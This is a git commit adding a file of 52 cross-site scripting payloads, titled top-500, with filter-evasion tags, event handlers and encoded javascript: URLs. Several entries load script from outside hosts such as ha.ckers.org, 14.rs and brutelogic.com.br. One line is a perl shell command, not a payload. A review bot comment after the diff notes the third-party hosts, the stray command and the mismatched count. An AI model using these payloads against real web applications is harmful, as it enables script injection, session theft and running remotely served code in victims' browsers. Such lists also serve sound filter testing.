
Commit 447943c

Add files via upload
1 parent 43fdbc7 commit 447943c


1 file changed

+52
-0
lines changed


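--- a/top-500-xss-payloads.txt
+++ b/top-500-xss-payloads.txt
@@ -0,0 +1,52 @@
+<IMG SRC="jav&#x0D;ascript:alert('XSS');">
+perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
+<IMG SRC=" &#14; javascript:alert('XSS');">
+<SCRIPT/XSS SRC="http://google.com"></SCRIPT>
+<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
+<SCRIPT/SRC="http://google.com"></SCRIPT>
+<<SCRIPT>alert("XSS");//<</SCRIPT>
+<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
+<SCRIPT SRC=//ha.ckers.org/.j>
+<IMG SRC="javascript:alert('XSS')"
+<iframe src=http://google.com <
+\";alert('XSS');//
+</TITLE><SCRIPT>alert("XSS");</SCRIPT>
+<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
+<BODY BACKGROUND="javascript:alert('XSS')">
+<IMG DYNSRC="javascript:alert('XSS')">
+<IMG LOWSRC="javascript:alert('XSS')">
+<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
+<IMG SRC='vbscript:msgbox("XSS")'>
+<IMG SRC="livescript:[code]">
+<BODY ONLOAD=alert('XSS')>
+<BGSOUND SRC="javascript:alert('XSS');">
+<A/hREf="j%0aavas%09cript%0a:%09con%0afirm%0d``">z
+<d3"<"/onclick="1>[confirm``]"<">z
+<d3/onmouseenter=[2].find(confirm)>z
+<details open ontoggle=confirm()>
+<script y="><">/*<script* */prompt()</script
+<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
+<a href="javascript%26colon;alert(1)">click
+<a href=javas&#99;ript:alert(1)>click
+<script/"<a"/src=data:=".<a,[8].some(confirm)>
+<svg/x=">"/onload=confirm()//
+<--`<img/src=` onerror=confirm``> --!>
+<svg%0Aonload=%09((pro\u006dpt))()//
+<sCript x>(((confirm)))``</scRipt x>
+<svg </onload ="1> (_=prompt,_(1)) "">
+<!--><script src=//14.rs>
+<embed src=//14.rs>
+<script x=">" src=//15.rs></script>
+<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
+<iframe/src \/\/onload = prompt(1)
+<x oncut=alert()>x
+<svg onload=write()>
+";a=prompt,a()//
+"><iframe%20src="http://google.com"%%203E
+"><img src=1 onerror=alert(1)>.gif
+"><img src=x onerror=prompt(1);>
+"><img src=x onerror=window.open('https://www.google.com/');>
+"><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;
+"><script src=//brutelogic.com.br&sol;1.js&num;
+"><script src=data:&comma;alert(1)//
+"><svg onload=alert(1)//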
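Review bot: Six of the added entries (new-file lines 8, 9, 37, 38, 39 and 50) load content from third-party hosts (`ha.ckers.org`, `14.rs`, `15.rs`, `brutelogic.com.br`), so replaying this list against an application under test runs whatever those hosts serve at that moment inside the tested origin. They should point at a placeholder the tester fills in instead, e.g. `<SCRIPT SRC=//TEST-HOST.example/xss.js>` (constructed placeholder, not a real host). New-file line 2 is a `perl -e` shell command that writes a NUL-containing tag to a file rather than a payload string, so a tool reading one entry per line will submit the command text itself; it should be dropped or replaced by a comment describing the NUL-byte case. The file name says top-500 but the hunk adds 52 lines, and nothing records where the entries came from, so a short header or README stating the source and the actual count would help anyone using the list as a filter regression corpus.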
